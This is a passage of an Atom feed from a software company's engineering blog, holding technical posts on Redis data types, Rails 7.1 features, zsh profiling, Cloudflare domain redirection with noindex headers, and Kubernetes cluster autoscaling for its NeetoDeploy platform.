of several different data types. Redis has a set of commands for each of these data types to do operations with them. In this post, we'll go over the different data types, what they are and how we can work with them.</p><h3>What are the different data types?</h3><p>Redis has more than a couple of data types, which can be used to store different data based on your needs.
These include the following:</p><ul><li><code>String</code> - The basic data type we are all familiar with.</li><li><code>List</code> - An array of strings.</li><li><code>Hash</code> - A collection of key-value pairs, similar to a Ruby <code>Hash</code>.</li><li><code>Set</code> - A collection of unique strings.</li><li><code>Sorted Set</code> - A collection of unique strings, ordered by each string's score.</li><li><code>HyperLogLog</code> - Probabilistic estimates of the cardinality of large sets.</li><li><code>Stream</code> - An append-only log.</li><li><code>Geospatial Index</code> - A data structure for storing geographic coordinates.</li></ul><h3>Checking the data type of your keys</h3><p>You can use the <code>TYPE</code> command to check what data type your key is. Once you know what type your key is, you can use the commands associated with that data type to interact with it.</p><pre><code>127.0.0.1:6379&gt; TYPE schedule
zset</code></pre><h3>Cheatsheet for Redis commands based on data type</h3><p>Each Redis data type has its own set of commands for doing operations with the key and its value. Here's a quick overview of the basic data types you would encounter and some of the basic commands to set, retrieve and delete data from them.</p><p><img src="/blog_images/2023/redis-data-types-deep-dive/redis-commands-based-on-data-types.png" alt="A list of Redis commands for doing operations with each data type."></p><p>Read more about the different data types in Redis and all the different commands that are available in the <a href="https://redis.io/docs/data-types/">official documentation</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 adds new option path_params for url_for helper method]]></title>
       <author><name>Neenu Chacko</name></author>
      <link href="https://www.bigbinary.com/blog/url-for-path-params-options"/>
      <updated>2023-11-07T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/url-for-path-params-options</id>
      <content type="html"><![CDATA[<p>With Rails 7.1, the <code>url_for</code> helper now supports a new option called <code>path_params</code>.</p><p>Prior to Rails 7.1, if you had your routes configured to be scoped under, say, <code>user_id</code> as shown below, you would have to explicitly specify the <code>user_id</code> in every single place where you want to generate a link for the scoped routes, such as when writing view files.</p><pre><code class="language-ruby"># routes.rb
Rails.application.routes.draw do
  root &quot;articles#index&quot;

  scope &quot;:user_id&quot; do
    get &quot;/articles&quot;, to: &quot;articles#index&quot;
    get &quot;/articles/:id&quot;, to: &quot;articles#show&quot;
  end

  get &quot;/categories&quot;, to: &quot;categories#index&quot;
end</code></pre><pre><code class="language-html">&lt;!-- app/views/articles/index.html.erb --&gt;
&lt;a href=&quot;&lt;%= articles_path(user_id: @current_user.id) %&gt;&quot;&gt; Articles &lt;/a&gt;</code></pre><p>This could be solved by updating <code>ApplicationController</code> and overriding the <code>default_url_options</code> method:</p><pre><code class="language-ruby"># application_controller.rb
class ApplicationController &lt; ActionController::Base
  def default_url_options
    { user_id: &quot;unique-id&quot; }
  end
end</code></pre><p>The <code>default_url_options</code> method sets default options for all the methods based on <code>url_for</code>. However, this meant that all routes, even those that did not belong to the <code>user_id</code> scope, would have the <code>?user_id=unique-id</code> query param appended to them, resulting in the following output:</p><pre><code class="language-ruby">articles_path # =&gt; /unique-id/articles
categories_path # =&gt; /categories?user_id=unique-id</code></pre><p>Rails 7.1 fixes this issue with the addition of the <code>path_params</code> option.
If you pass a hash of parameters to this key, those parameters will only be used for the named segments of the route. If they aren't used, they are discarded instead of being appended to the end of the route as query params.</p><p>With this change, we can implement the <code>default_url_options</code> method as follows:</p><pre><code class="language-ruby">class ApplicationController &lt; ActionController::Base
  def default_url_options
    { path_params: { user_id: &quot;unique-id&quot; } }
  end
end</code></pre><p>The <code>url_for</code> helper method will now give you the following output:</p><pre><code class="language-ruby">articles_path # =&gt; /unique-id/articles
articles_path(user_id: &quot;test-id&quot;) # =&gt; /test-id/articles
categories_path # =&gt; /categories
categories_path(user_id: &quot;test-id&quot;) # =&gt; /categories</code></pre><p>The view file can now be written as:</p><pre><code class="language-html">&lt;a href=&quot;&lt;%= articles_path %&gt;&quot;&gt; Articles &lt;/a&gt;</code></pre><p>This is very useful in situations where you only want to add a required param that is part of the route's URL without introducing unnecessary query params for other routes.</p><p>Please check out this <a href="https://github.com/rails/rails/pull/43770">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 comes with an optimized default SQLite3 adapter connection configuration]]></title>
       <author><name>Vishnu M</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-1-comes-with-an-optimized-default-sqlite3-adapter-connection-configuration"/>
      <updated>2023-10-31T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-1-comes-with-an-optimized-default-sqlite3-adapter-connection-configuration</id>
      <content type="html"><![CDATA[<p>The default SQLite3 Active Record adapter connection configuration has been updated in Rails 7.1 to better tune it for modern Rails applications.</p><p>Before moving on to the configuration changes, let us understand what a PRAGMA is. <a href="https://www.sqlite.org/pragma.html">PRAGMA</a> is a special kind of SQL statement (only available in SQLite) which is used to query or manipulate various aspects of the database's behaviour and configuration.</p><h2>Configuration Changes</h2><h3>1. <code>journal_mode</code> is now set to use <code>WAL</code> instead of the rollback journal</h3><p><a href="https://www.sqlite.org/pragma.html#pragma_journal_mode">journal_mode</a> is a configuration setting in SQLite that determines how the database handles transactions and maintains data integrity in the face of system crashes or unexpected shutdowns. Previously, a brand new Rails application used the rollback journal with the <code>DELETE</code> journal mode. Now it uses a much more efficient journaling method named Write-Ahead Logging (<code>WAL</code>). Let us understand the difference between them.</p><p><strong>Rollback journal</strong>: In this implementation, the database engine first records the original unchanged database content in a rollback journal, and the writes are made directly to the database file. If the system crashes, the rollback journal can be used to restore the database to the state it was in before the transaction began. The issue with this approach is that either a writer can alter the database or readers can read from it, but not both at the <strong>same</strong> time.</p><p><strong>Write-ahead logging</strong>: In <code>WAL</code> mode, SQLite maintains a separate write-ahead log. Instead of writing directly to the database file, changes are written to the log first.
When a reader needs a page of content, it first checks the <code>WAL</code> to see if the page appears there, and if so it pulls in the latest copy of the page from the <code>WAL</code>. If no copy of the page exists in the <code>WAL</code>, then the page is read from the original database file. This means readers and writers can work together and there is no contention.</p><p><strong>How is the database file made up-to-date with the <code>WAL</code> file?</strong></p><p>SQLite routinely moves the <code>WAL</code> file transactions back into the database. This process is called checkpointing. By default, SQLite does a checkpoint automatically when the <code>WAL</code> file reaches a threshold size of 1000 pages.</p><p>If a system crash occurs before the last commit record has been written to the <code>WAL</code> file, the new data is not considered valid, and the database simply ignores it.</p><p><code>WAL</code> is a better choice for web applications because of the increased concurrency it offers.</p><p><a href="https://fly.io/blog/sqlite-internals-wal/">Here</a> is a nice article on how <code>WAL</code> works under the hood.</p><h3>2. <code>synchronous</code> is now set to <code>NORMAL</code> instead of <code>FULL</code></h3><p>The <a href="https://www.sqlite.org/pragma.html#pragma_synchronous">synchronous</a> pragma controls how and when SQLite flushes content to disk. The two common options are <code>FULL</code> and <code>NORMAL</code>, which map to syncing on every write and syncing only at critical moments (such as checkpoints) respectively. <code>FULL</code> synchronous is very safe but slow. When synchronous is <code>NORMAL</code>, the database engine will still sync at the most critical moments, but less often than in <code>FULL</code> mode. We trade an aggressive approach to durability for speed.</p><p>The SQLite documentation suggests using <code>NORMAL</code> for applications running in <code>WAL</code> mode.</p><h3>3. <code>journal_size_limit</code> is now capped at 64MB</h3><p>The <a href="https://www.sqlite.org/pragma.html#pragma_journal_size_limit">journal_size_limit</a> pragma tells SQLite how much of the write-ahead log data to keep in the on-disk file. Previously, it was set to <code>-1</code>, which means there was no limit on the journal size, allowing it to grow unbounded and thereby potentially affecting read performance. Now it is capped at an appropriate size of 64MB.</p><h3>4. <code>cache_size</code> is now set to 8MB</h3><p>The <a href="https://www.sqlite.org/pragma.html#pragma_cache_size">cache_size</a> pragma sets the maximum number of database disk pages that SQLite will hold in memory at once, per open database file. The default value was -2000, i.e. 2000 KiB (~2MB). Please note that SQLite interprets a negative value as a size limit in kibibytes and a positive number as a page limit. Now the cache_size is set to 2000 (pages) with a default page size of 4096 bytes, which means the cache limit is ~8MB.</p><h3>5. <code>mmap_size</code> is now set to 128MB</h3><p>The <a href="https://www.sqlite.org/pragma.html#pragma_mmap_size">mmap_size</a> pragma sets the maximum number of bytes that are set aside for memory-mapped I/O on a single database. Let us first understand what memory-mapped I/O is.</p><p>Memory-mapped (mmap) I/O is an OS-provided feature that maps the contents of a file on secondary storage into a program's address space. The program then accesses pages via pointers as if the file resided entirely in memory. The OS transparently loads pages only when the program references them and automatically evicts pages if memory fills up. The advantage of using mmap is that it bypasses the step where we need to copy the pages from secondary to primary storage, thereby making it faster.</p><p><strong>How is memory-mapped I/O implemented in SQLite?</strong></p><p>SQLite accesses and updates database files using <code>xRead()</code> and <code>xWrite()</code> methods by default. These methods are typically implemented as <code>read()</code> and <code>write()</code> system calls, which cause the OS to copy disk content between the kernel buffer cache and user space. SQLite also has the option of accessing disk content directly using memory-mapped I/O via the <code>xFetch()</code> and <code>xUnfetch()</code> methods. Using the legacy <code>xRead()</code> method, a page-sized heap memory block is allocated, and the <code>xRead()</code> call copies the entire database page content into this allocated memory. Whereas if memory-mapped I/O is enabled, SQLite calls the <code>xFetch()</code> method instead. The <code>xFetch()</code> method asks the operating system to return a pointer to the requested page. If the requested page has been or can be mapped into the application address space, then <code>xFetch()</code> returns a pointer to that page for SQLite to use without having to copy anything. Skipping the copy step is what makes memory-mapped I/O faster.</p><p>The <code>mmap_size</code> is the maximum number of bytes of the database file that SQLite will try to map into the process address space at one time. Now it is set to 128MB.</p><p>With these changes, there is a considerable improvement in performance. That being said, SQLite makes a strong case for single-node production applications, as it is highly performant, especially when used in conjunction with NVMe disks.</p><p>Please check out this <a href="https://github.com/rails/rails/pull/49349">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Profiling your zsh setup with zprof]]></title>
       <author><name>Sreeram Venkitesh</name></author>
      <link href="https://www.bigbinary.com/blog/zsh-profiling"/>
      <updated>2023-10-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/zsh-profiling</id>
       <content type="html"><![CDATA[<p>While using frameworks like <a href="https://ohmyz.sh/">oh-my-zsh</a> to upgrade your shell, it is pretty easy to get carried away with all the available plugins. This can eventually take a toll on your shell's performance. One significant way it can affect your workflow is by slowing everything down. The more items you add to your <code>.zshrc</code> file, the more time your shell will need to start up. Profiling your shell is a good start to figuring out what is slowing it down.</p><h3>zprof</h3><p><a href="https://zsh.sourceforge.io/Doc/Release/Zsh-Modules.html#The-zsh_002fzprof-Module">zprof</a> is a utility that comes packaged with zsh, which you can use to profile your zsh script.</p><p>Add the following to the top of your <code>.zshrc</code> file to load zprof.</p><pre><code class="language-bash">zmodload zsh/zprof</code></pre><p>At the bottom of your <code>.zshrc</code>, add the following.</p><pre><code class="language-bash">zprof</code></pre><p>This will profile your zsh script and print a summary of all the commands run during your shell startup and the time each takes to execute. Run <code>exec zsh</code> to apply the changes and restart your shell. Your shell will print something like this:</p><p><img src="/blog_images/2023/zsh-profiling/zprof-output.png" alt="Output of the zprof command"></p><p>With this you can see which commands are taking the most time to load. Enabling profiling has helped pinpoint the issue, and now you can look into fixing it. In the above example, you can see that nvm is taking up a considerable amount of time.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Optimizing NeetoDeploy's Cluster Autoscaler]]></title>
       <author><name>Sreeram Venkitesh</name></author>
      <link href="https://www.bigbinary.com/blog/optimizing-neeto-deploy-autoscaler"/>
      <updated>2023-10-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/optimizing-neeto-deploy-autoscaler</id>
      <content type="html"><![CDATA[<p>Once we <a href="https://bigbinary.com/blog/solving-scalability-in-neeto-deploy">configured the Cluster Autoscaler</a> to scale NeetoDeploy according to the load, the next challenge was how to do this efficiently. The primary issue we had to solve was to reduce the time we had to wait for the nodes to scale up.</p><h2>Challenges faced</h2><p>The Cluster Autoscaler works by monitoring the pods and checking if they are waiting to get scheduled. If no nodes are available to schedule the waiting pods, they will be in the <code>Pending</code> state until the <code>kube-scheduler</code> finds a suitable node.</p><p>With our default Cluster Autoscaler setup, if a pod is provisioned when the cluster is at maximum capacity, the pod will go into the <code>Pending</code> state and remain there until the cluster has scaled up. This entire flow consists of the following steps:</p><ul><li>The Cluster Autoscaler scans the pods and identifies the un-schedulable pods.</li><li>The Cluster Autoscaler provisions a new node. We have configured the autoscaler deployment with the necessary permissions for the autoscaling groups in EC2, with which the autoscaler can provision new EC2 machines.</li><li>Kubernetes adds the newly provisioned node to the cluster's control plane, and the cluster is scaled up.</li><li>The pending pod gets scheduled to the newly added node.</li></ul><p>From the perspective of a user who wants to get their application deployed, a considerable amount of time is taken to complete all these steps in addition to the time taken to build and release their code. We can only optimize it so much by decreasing the scan interval of the Cluster Autoscaler. We need a mechanism by which we can always have some buffer nodes ready so that the users' deployments never go into the <code>Pending</code> state and wait for the nodes to be provisioned.</p><h2>Pod Priority, Preemption and Overprovisioning</h2><p>Kubernetes allows us to assign different priorities to pods. By default, all the pods have a priority of <code>0</code>. When a pod is scheduled, it can preempt or evict other pods with lower priority than itself and take their place. We will use this feature of pod preemption to reserve resources for incoming deployments.</p><p>We created a new pod priority class with a priority of <code>-1</code> and used this to overprovision <a href="https://www.ianlewis.org/en/almighty-pause-container">pause pods</a>. We allocated a fixed amount of CPU and memory resources to these pause pods. The pause container is a placeholder container used by Kubernetes internally and doesn't do anything by itself.</p><p><img src="/blog_images/2023/optimizing-neeto-deploy-autoscaler/overprovisioned-cluster.png" alt="Illustration of overprovisioning a Kubernetes cluster"></p><p>Now if the cluster is at full capacity and a new deployment is created, technically the newly created pod doesn't have space to be scheduled in the cluster. In normal cases, this would warrant a scale-up to be triggered by the Cluster Autoscaler, and the pod would be <code>Pending</code> until the new node is provisioned and attached to the cluster.</p><p><img src="/blog_images/2023/optimizing-neeto-deploy-autoscaler/overprovisioner-stage-1.png" alt="Illustration of a new pod getting created in an overprovisioned cluster"></p><p>We can save a lot of time in this process since we have the overprovisioned pods with a lower pod priority. The newly created deployment would have a pod priority of <code>0</code> by default, and our placeholder pause pods with a priority of <code>-1</code> would be evicted in favor of this application pod. This means that new pods can be scheduled without having to wait for the Cluster Autoscaler to do its magic.
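</p><p>The setup described above can be sketched as two small manifests; this is a hedged sketch with illustrative names, resource sizes, and replica counts, not our exact production configuration:</p><pre><code class="language-yaml"># A priority class below the default priority of 0,
# so ordinary pods can preempt anything that uses it
apiVersion: scheduling.k8s.io/v1
kind: PriorityClass
metadata:
  name: overprovisioning
value: -1
globalDefault: false
description: "Priority class for placeholder pause pods"
---
# Pause pods that hold cluster capacity in reserve
apiVersion: apps/v1
kind: Deployment
metadata:
  name: overprovisioning
spec:
  replicas: 3
  selector:
    matchLabels:
      run: overprovisioning
  template:
    metadata:
      labels:
        run: overprovisioning
    spec:
      priorityClassName: overprovisioning
      containers:
        - name: pause
          image: registry.k8s.io/pause:3.9
          resources:
            requests:
              cpu: 500m
              memory: 512Mi</code></pre><p>Because these pods sit below the default priority of <code>0</code>, any ordinary application pod can evict them immediately.</p><p>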
Some space would always be reserved in our cluster.</p><p><img src="/blog_images/2023/optimizing-neeto-deploy-autoscaler/overprovisioner-stage-2.png" alt="Illustration of a pod evicting an overprovisioning pod with lower priority"></p><p>The pause pods would now move to the <code>Pending</code> state after being evicted, which the Cluster Autoscaler will pick up, and it will start provisioning a new node. This way, the autoscaler doesn't have to wait for a user to create a new deployment to scale up the cluster. Instead, it does it in advance to reserve some space for potential deployments.</p><p><img src="/blog_images/2023/optimizing-neeto-deploy-autoscaler/overprovisioner-stage-3.png" alt="Illustration of an evicted overprovisioning pod triggering cluster scale up"></p><h2>Trade-offs</h2><p>Now that we have the overprovisioning deployments configured to reserve some space in NeetoDeploy's cluster, we had to decide how much space to reserve. If we increase the CPU and memory limit for the overprovisioning pods or their number of replicas, we will have more space reserved in our cluster. This means that we can handle more user deployments concurrently, but we will incur the cost of keeping the extra buffer running. The trade-off here is between the cost we are willing to pay and the load we want to handle.</p><p>For running NeetoDeploy, we started with three copies of overprovisioning pods with 500 milli vCPUs each, and later scaled it to 10 replicas after we moved the review apps of all the <a href="https://neeto.com">Neeto products</a> to NeetoDeploy. We have been running all our internal staging deployments and review apps on this setup for the past eleven months, and this configuration has been working pretty well for us so far.</p><p>If your application runs on Heroku, you can deploy it on NeetoDeploy without any change. If you want to give NeetoDeploy a try, then please send us an email at <a href="mailto:invite@neeto.com">invite@neeto.com</a>.</p><p>If you have questions about NeetoDeploy or want to see the journey, follow NeetoDeploy on <a href="https://twitter.com/neetodeploy">Twitter</a>. You can also join our <a href="https://launchpass.com/neetohq">community Slack</a> to chat with us about any Neeto product.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 adds support for multi-column ordering in ActiveRecord::Batches]]></title>
       <author><name>Navaneeth D</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-1-adds-support-for-multi-column-ordering-in-activerecord-batches"/>
      <updated>2023-10-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-1-adds-support-for-multi-column-ordering-in-activerecord-batches</id>
      <content type="html"><![CDATA[<p>In Rails 7.1, an enhancement has been introduced to the <a href="https://edgeapi.rubyonrails.org/classes/ActiveRecord/Batches.html"><code>ActiveRecord::Batches</code></a> methods, related to models with composite primary keys. This update allows developers to specify ascending or descending order for each key within a composite primary key.</p><h3>Before Rails 7.1</h3><p>In Rails versions prior to 7.1, when batch processing records with a composite primary key, like <code>id_1</code> and <code>id_2</code>, developers could use the <code>:asc</code> or <code>:desc</code> argument to control the sorting order. However, there was a limitation in how this sorting worked. When you specified the sorting order using <code>:asc</code> or <code>:desc</code>, it affected both <code>id_1</code> and <code>id_2</code> simultaneously. In other words, if you requested ascending order, both <code>id_1</code> and <code>id_2</code> would be sorted in ascending order together. Similarly, if you requested descending order, both <code>id_1</code> and <code>id_2</code> would be sorted in descending order together.</p><p>This limitation had practical implications, especially when you needed to sort records by different criteria for each part of the composite primary key.</p><h3>After Rails 7.1</h3><p>With the new enhancement in Rails 7.1, developers can now select the sorting order for each key within a composite primary key. Let's see this with an example.</p><p>Consider a scenario where you have a <code>Product</code> model with a composite primary key, <code>category_id</code> and <code>product_id</code>. You want to fetch products in descending order of <code>category_id</code> and ascending order of <code>product_id</code>. With Rails 7.1, this becomes straightforward:</p><pre><code class="language-ruby">class Product &lt; ActiveRecord::Base
  self.primary_key = [:category_id, :product_id]
end

# Retrieving products in descending order of
# category_id and ascending order of product_id
Product.find_each(order: [:desc, :asc]) do |product|
  # Your processing logic for each product goes here
end</code></pre><p>The <a href="https://edgeapi.rubyonrails.org/classes/ActiveRecord/Batches.html#method-i-find_each"><code>find_each</code></a> method is a part of <code>ActiveRecord::Batches</code> and is used for efficient batch processing of records from the database. It retrieves records in small batches, reducing memory consumption and improving performance. The method takes an optional <code>order</code> argument, which, as of Rails 7.1, can accept an array of symbols to specify the sorting order for each key within the composite primary key.</p><p>The enhancement for specifying sorting orders for composite primary keys is not limited to <code>find_each</code>. It applies to other batch processing methods provided by <code>ActiveRecord::Batches</code>, such as <a href="https://edgeapi.rubyonrails.org/classes/ActiveRecord/Batches.html#method-i-find_in_batches"><code>find_in_batches</code></a> and <a href="https://edgeapi.rubyonrails.org/classes/ActiveRecord/Batches.html#method-i-in_batches"><code>in_batches</code></a>. These methods allow you to retrieve and process records in batches efficiently, just like <code>find_each</code>.</p><h3>Conclusion</h3><p>In Rails 7.1, the support for multi-column ordering in batches for models with composite primary keys brings more flexibility and control to your application's data retrieval process.
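</p><p>The mixed-direction semantics can be mimicked in plain Ruby; here is a minimal sketch over hypothetical in-memory rows, sorting <code>category_id</code> descending and <code>product_id</code> ascending:</p><pre><code class="language-ruby"># Hypothetical rows standing in for Product records
products = [
  { category_id: 1, product_id: 2 },
  { category_id: 2, product_id: 1 },
  { category_id: 2, product_id: 3 },
  { category_id: 1, product_id: 1 }
]

# Negating category_id makes the first key sort :desc,
# while product_id stays :asc as the second key
sorted = products.sort_by { |p| [-p[:category_id], p[:product_id]] }

sorted.first # => { category_id: 2, product_id: 1 }</code></pre><p>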
Now you can tailor the sorting of composite keys to match your specific needs, providing a more powerful and versatile toolset for your Rails development endeavors.</p><p>Please check out this <a href="https://github.com/rails/rails/pull/48268">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 adds *_deliver callbacks to Action Mailer]]></title>
       <author><name>Calvin Chiramal</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-1-adds-_-deliver-callbacks-to-action-mailer"/>
      <updated>2023-09-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-1-adds-_-deliver-callbacks-to-action-mailer</id>
      <content type="html"><![CDATA[<p>Rails 7.1 has added *_deliver callbacks to Action Mailer. Let's understand the use of these callbacks with an example. Consider a case where you want to send an email after a user has signed up.</p><pre><code class="language-ruby">class UserMailer &lt; ApplicationMailer
  default from: 'notifications@neeto.com'

  def welcome_email
    @user = params[:user]
    mail(to: @user.email, subject: 'Welcome to neeto')
  end
end</code></pre><p>When the <code>mail</code> method is called in the above code, it just renders the mail template from a view. The mail is actually not sent. The actual delivery may happen synchronously or asynchronously. To send the mail, we need to call one of the many deliver methods.</p><pre><code class="language-ruby">UserMailer.with(user: @user).welcome_email.deliver_later</code></pre><p>Before Rails 7.1, we did not have any callbacks around the deliver methods to execute code around the delivery lifecycle. You would need to use <a href="https://guides.rubyonrails.org/action_mailer_basics.html#intercepting-and-observing-emails">interceptors and observers</a> to hook into the mail delivery lifecycle. Say you need to send emails to only a few allowed email addresses in the staging environment. You would need to write an interceptor and register it with Action Mailer.</p><pre><code class="language-ruby"># interceptors/staging_email_interceptor.rb
module Interceptors
  class StagingEmailInterceptor
    def self.delivering_email(mail)
      if Rails.env.staging? &amp;&amp; !allowed_emails.include?(mail.to)
        mail.perform_deliveries = false
      end
    end
  end
end</code></pre><pre><code class="language-ruby"># config/initializers/action_mailer.rb
ActionMailer::Base.register_interceptor(Interceptors::StagingEmailInterceptor)</code></pre><p>The new <code>before_deliver</code> callback allows you to handle this situation without using interceptors or observers. You would just need to include the following in <code>UserMailer</code>.</p><pre><code class="language-ruby">class UserMailer &lt; ApplicationMailer
  default from: 'notifications@neeto.com'

  before_deliver :filter_allowed_emails

  def welcome_email
    @user = params[:user]
    mail(to: @user.email, subject: 'Welcome to neeto')
  end

  private

    def filter_allowed_emails
      if Rails.env.staging? &amp;&amp; !allowed_emails.include?(mail.to)
        mail.perform_deliveries = false
      end
    end
end</code></pre><p>Similarly, suppose you want to update the <code>mail_delivered_at</code> attribute of the <code>user</code> instance. You would have to use an observer and register it like so:</p><pre><code class="language-ruby"># observers/set_delivered_at_observer.rb
module Observers
  class SetDeliveredAtObserver
    def self.delivered_email(mail)
      user = User.find_by(email: mail.to)
      user.update(mail_delivered_at: mail.date)
    end
  end
end</code></pre><pre><code class="language-ruby"># config/initializers/action_mailer.rb
ActionMailer::Base.register_interceptor(Interceptors::StagingEmailInterceptor)
ActionMailer::Base.register_observer(Observers::SetDeliveredAtObserver)</code></pre><p>With the new <code>after_deliver</code> callback, this becomes as simple as defining a method in <code>UserMailer</code>.</p><pre><code class="language-ruby">class UserMailer &lt; ApplicationMailer
  default from: 'notifications@neeto.com'

  before_deliver :filter_allowed_emails
  after_deliver :set_delivered_at

  def welcome_email
    @user = params[:user]
    mail(to: @user.email, subject: 'Welcome to neeto')
  end

  private

    def filter_allowed_emails
      if Rails.env.staging? &amp;&amp; !allowed_emails.include?(mail.to)
        mail.perform_deliveries = false
      end
    end

    def set_delivered_at
      @user.update(mail_delivered_at: mail.date)
    end
end</code></pre><p>An important thing to keep in mind is the order of execution of the callbacks.</p><ul><li>before_action</li><li>after_action</li><li>before_deliver</li><li>after_deliver</li></ul><p>This makes sense, as the deliver callbacks only wrap around the deliver methods while the action callbacks wrap around the mail render method.</p><p>Please check out this <a href="https://github.com/rails/rails/pull/47630">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Handling domain redirection while maintaining different google crawl attributes using Cloudflare]]></title>
       <author><name>Ghouse Mohamed</name></author>
      <link href="https://www.bigbinary.com/blog/domain-redirection-using-cloudflare"/>
      <updated>2023-08-31T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/domain-redirection-using-cloudflare</id>
      <content type="html"><![CDATA[<p><a href="https://neeto.com">neeto</a> is a collection of different software. Each neeto product gets its own page. For example, NeetoCal gets the URL https://www.neeto.com/neetocal.</p><p>When it comes to actually using these products, you will be redirected to <code>https://subdomain.neetocal.com</code>. Here, &quot;subdomain&quot; would be the subdomain allocated to you when you signed up for Neeto.</p><p>We planned to add a &quot;Google sign in&quot; feature to make it easier for folks both to sign up and to log in. During testing, it all worked fine. However, when we asked Google to approve the app NeetoCal for &quot;Google sign in&quot;, Google demanded that our users should be able to see the &quot;Privacy Policy&quot; and &quot;Terms and Conditions&quot; on the website. In order to make Google happy, we added a redirection from &quot;neetocal.com&quot; to &quot;neeto.com/neetocal&quot;.</p><p>However, Google was not happy with it. The users are logging into <code>https://subdomain.neetocal.com</code>, so the &quot;privacy policy&quot; and &quot;terms of service&quot; should be visible on the domain &quot;neetocal.com&quot; itself.</p><p>We are using Cloudflare as our DNS provider. Using the tools provided to us by Cloudflare, we decided to show the content of &quot;neeto.com/neetocal&quot; on &quot;neetocal.com&quot; without redirecting the user.</p><p>Note that in this case, if you type &quot;neetocal.com&quot;, then you will see the URL change to &quot;neetocal.com/neetocal&quot; instantly. That's because the URL of the main marketing site is &quot;neeto.com/neetocal&quot;.</p><p>Cloudflare provides <a href="https://developers.Cloudflare.com/support/page-rules/understanding-and-configuring-Cloudflare-page-rules-page-rules-tutorial/">Page rules</a>, which we will be using to achieve our goals. Below is a video of how it was done.</p><iframe width="100%" height="315" src="https://www.youtube.com/embed/RodZIBxYBHc" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe><h2>SEO duplicate content issue</h2><p>The Google search engine doesn't like it when we show exactly the same content on two different domains. Google thinks that the site is trying to cheat, and Google will punish both sites.</p><p>We want Google to index our main marketing site https://neeto.com/neetocal, and we want Google to ignore &quot;neetocal.com&quot;. One way to tell Google not to index the site is by adding a <code>noindex</code> <a href="https://developers.google.com/search/docs/crawling-indexing/robots-meta-tag#noindex">meta tag</a>.</p><pre><code>&lt;meta name=&quot;robots&quot; content=&quot;noindex&quot;&gt;</code></pre><p>In the above example, we are asking all bots not to index the page containing the above meta tag.</p><p>We planned to inject this meta tag when a page is rendered for the URL &quot;neetocal.com&quot;, and we will not inject this tag when the page is rendered for the URL &quot;neeto.com&quot;.</p><p>Upon more research, we found that search engines also look at the response headers. Given below is the sequence that search engines follow for indexing web pages.</p><ul><li>The crawler gets the raw page source as a response to the HTTP request.</li><li>The crawler checks if the <code>x-robots-tag: noindex, nofollow</code> header is present in the response.</li><li>The crawler checks the meta tags to determine if the page needs to be indexed or not.</li></ul><p>If a page has <code>x-robots-tag: noindex, nofollow</code>, then the crawler will not index the page.</p><p>Based on this information, we decided to use the <a href="https://developers.Cloudflare.com/rules/transform/response-header-modification/">Response Header Modification Rules</a> feature of Cloudflare. Below is a video of how it was done.</p><iframe width="100%" height="315" src="https://www.youtube.com/embed/0AFeM2yyg_A" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>]]></content>
    </entry><entry>
       <title><![CDATA[Solving scaling challenges in NeetoDeploy using Cluster Autoscaler]]></title>
       <author><name>Sreeram Venkitesh</name></author>
      <link href="https://www.bigbinary.com/blog/solving-scalability-in-neeto-deploy"/>
      <updated>2023-08-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/solving-scalability-in-neeto-deploy</id>
      <content type="html"><![CDATA[<p>We are building <a href="https://www.neeto.com/neetodeploy">NeetoDeploy</a>. It's a Herokualternative. Check out our previous blog to see<a href="https://www.bigbinary.com/blog/neeto-deploy-zero-to-one">how we started</a>building NeetoDeploy.</p><p>We started using NeetoDeploy internally for all our staging applications and the&quot;pull request review&quot; applications. Very soon, we ran into scaling challenges.Some days, we have too many pull requests, and some days, very few pullrequests. Some days, the staging sites have an extra load.</p><p>Scaling is a fundamental problem in container orchestration. We need to ensurethat we have enough computing resources to handle the load, and at the sametime, we need to make sure we are not spending money on resources that are notbeing utilized. If we need to run 10 applications, we should only have to payfor as much computing as is required for running 10 applications. But if thisnumber increases to 100 one day, our system should be able to provision newcomputing resources.</p><h2>Understanding Kubernetes Autoscalers</h2><p>When we need to scale, we can manually allocate resources. This istime-consuming and repetitive. Kubernetes excels in autoscaling. It providesmany different options to meet our scaling needs.</p><p>We can define autoscalers of different types to make our cluster and ourdeployments scale up or down based on various parameters and handle trafficgracefully. 
Kubernetes has three kinds of autoscalers operating at differentlevels.</p><h3>Horizontal Pod Autoscaler (HPA)</h3><p>The Horizontal Pod Autoscaler can scale up our Kubernetes deployments byincreasing the number of copies of our app's container, known as<a href="https://kubernetes.io/docs/concepts/workloads/controllers/replicaset/">replicas</a>.We can configure our Horizontal Pod Autoscaler to scale up our apps based onmetrics like increased memory usage, network load, or even the time of the daywhen we expect more traffic. Incoming traffic would be redirected to any of thereplicas and Kubernetes takes care of this.</p><p><img src="/blog_images/2023/solving-scalability-in-neeto-deploy/hpa.png" alt="Illustration of how horizontal pod autoscaling works"></p><h3>Vertical Pod Autoscaler (VPA)</h3><p>The Vertical Pod Autoscaler takes a different approach to the same problemsolved by the Horizontal Pod Autoscaler. The Vertical Pod Autoscaler increasesthe CPU and memory resources allocated to our pod based on the load. The numberof containers running would remain the same, but they would have more resourcesto work with and, hence, would be able to handle increased loads.</p><p><img src="/blog_images/2023/solving-scalability-in-neeto-deploy/vpa.png" alt="Illustration of how vertical pod autoscaling works"></p><h3>Cluster 